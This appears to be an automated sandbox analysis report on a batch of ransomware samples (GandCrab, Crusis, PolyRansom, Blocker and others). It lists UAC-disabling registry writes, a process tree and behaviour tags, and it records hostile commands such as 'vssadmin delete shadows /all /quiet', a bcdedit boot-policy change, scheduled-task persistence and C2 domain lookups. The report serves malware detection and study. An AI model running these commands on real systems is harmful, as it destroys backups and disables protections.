Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	lurwhzlcveb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lurwhzlcveb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	ajhqekm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	lurwhzlcveb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun = "1"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	lurwhzlcveb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	lurwhzlcveb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ajhqekm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	ajhqekm.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

Hidden Files and Directories

pid	Process
5864	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00378.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3476

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4728
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:468
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Users\Admin\Desktop\00378\tpvpyme.exe
      "C:\Users\Admin\Desktop\00378\tpvpyme.exe"
      4⤵
      Modifies firewall policy service
      Modifies visiblity of hidden/system files in Explorer
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      PID:1776
    - - C:\Windows\splwow64.exe
        
        C:\Windows\splwow64.exe 12288
        5⤵
        
        PID:7556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00378\USB_Habilitar.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00378\windowsUpdate.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6568
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:11220
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:11128
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
    HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
      EUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:3404
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "PCI Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAE7B.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3476
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "PCI Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpB6B9.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3844
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 1420
      4⤵
      Program crash
      PID:3828
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
    HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4928
  - - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
      HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks SCSI registry key(s)
      PID:8824
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe
    HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:672
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EED.tmp\8EEE.bat C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe"
      4⤵
      PID:5032
- - C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe
    3⤵
    - Modifies WinLogon for persistence
    - Drops startup file
    - Executes dropped EXE
    - Enumerates connected drives
    - Drops autorun.inf file
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:3936
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
    Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe
      "C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe" "c:\users\admin\desktop\00378\trojan-ransom.win32.blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe*"
      4⤵
      Modifies WinLogon for persistence
      UAC bypass
      Adds policy Run key to start application
      Disables RegEdit via registry modification
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Hijack Execution Flow: Executable Installer File Permissions Weakness
      Drops file in System32 directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      System policy modification
      PID:4324
    - - C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe" "-C:\Windows\system32\\zryqncncriuikukh.exe"
        5⤵
        Modifies WinLogon for persistence
        UAC bypass
        Adds policy Run key to start application
        Disables RegEdit via registry modification
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Adds Run key to start application
        Checks whether UAC is enabled
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Drops autorun.inf file
        Drops file in System32 directory
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:4328
    - - C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe" "-C:\Windows\system32\\zryqncncriuikukh.exe"
        5⤵
        Modifies WinLogon for persistence
        UAC bypass
        Adds policy Run key to start application
        Disables RegEdit via registry modification
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Drops file in System32 directory
        Drops file in Windows directory
        System policy modification
        
        PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe
      "C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe" "c:\users\admin\desktop\00378\trojan-ransom.win32.blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe"
      4⤵
      Modifies WinLogon for persistence
      UAC bypass
      Adds policy Run key to start application
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      Drops file in Windows directory
      System policy modification
      PID:5868
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe
    Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5020
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
    Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:2004
  - - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
      C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe
      4⤵
      Executes dropped EXE
      PID:9960
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
    Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1652
  - - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
      C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops desktop.ini file(s)
      Drops file in System32 directory
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious behavior: RenamesItself
      PID:5804
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        5⤵
        
        PID:5280
      - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        6⤵
        
        PID:7312
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:1808
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        5⤵
        
        PID:7264
      - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        6⤵
        
        PID:4964
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:5588
    - - C:\Windows\System32\mshta.exe
        
        "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
        5⤵
        
        PID:2624
    - - C:\Windows\System32\mshta.exe
        
        "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
        5⤵
        
        PID:6668
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe
    Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3188
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
    Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe
    3⤵
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - System Location Discovery: System Language Discovery
    PID:4956
  - - C:\Users\Admin\AppData\Roaming\Sun\Sunwin.exe
      "C:\Users\Admin\AppData\Roaming\Sun\Sunwin.exe"
      4⤵
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      PID:3472
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp5530a0ca.bat"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3988
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
    Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: MapViewOfSection
    PID:3172
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup nomoreransom.bit dns1.soprodns.ru
      4⤵
      System Location Discovery: System Language Discovery
      PID:1928
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup emsisoft.bit dns1.soprodns.ru
      4⤵
      System Location Discovery: System Language Discovery
      PID:5276
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup gandcrab.bit dns1.soprodns.ru
      4⤵
      System Location Discovery: System Language Discovery
      PID:10220
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
    Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- - C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
    Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: RenamesItself
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2308
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:5068
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4460
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 540
      4⤵
      Program crash
      PID:3520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 548
      4⤵
      Program crash
      PID:4228
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 576
      4⤵
      Program crash
      PID:2684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 628
      4⤵
      Program crash
      PID:860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 588
      4⤵
      Program crash
      PID:2256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 560
      4⤵
      Program crash
      PID:4384
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 560
      4⤵
      Program crash
      PID:1112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 696
      4⤵
      Program crash
      PID:5572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 684
      4⤵
      Program crash
      PID:5924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 784
      4⤵
      Program crash
      PID:6008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 824
      4⤵
      Program crash
      PID:3884
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 832
      4⤵
      Program crash
      PID:5128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 860
      4⤵
      Program crash
      PID:5588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 792
      4⤵
      Program crash
      PID:5800
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 760
      4⤵
      Program crash
      PID:6700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 820
      4⤵
      Program crash
      PID:6108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 864
      4⤵
      Program crash
      PID:8668
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 744
      4⤵
      Program crash
      PID:5392
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 620
      4⤵
      Program crash
      PID:1940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 860
      4⤵
      Program crash
      PID:2672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 776
      4⤵
      Program crash
      PID:6704
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 836
      4⤵
      Program crash
      PID:7988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 764
      4⤵
      Program crash
      PID:9244
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 896
      4⤵
      Program crash
      PID:10904
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 888
      4⤵
      Program crash
      PID:8904
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 812
      4⤵
      Program crash
      PID:5448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 884
      4⤵
      Program crash
      PID:9700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 932
      4⤵
      Program crash
      PID:11148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 952
      4⤵
      Program crash
      PID:856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 960
      4⤵
      Program crash
      PID:8560
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 936
      4⤵
      Program crash
      PID:6872
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 976
      4⤵
      Program crash
      PID:6888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 964
      4⤵
      Program crash
      PID:8680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 968
      4⤵
      Program crash
      PID:6188
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 948
      4⤵
      PID:6952
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1016
      4⤵
      PID:7908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 996
      4⤵
      PID:7568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 968
      4⤵
      PID:3324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1040
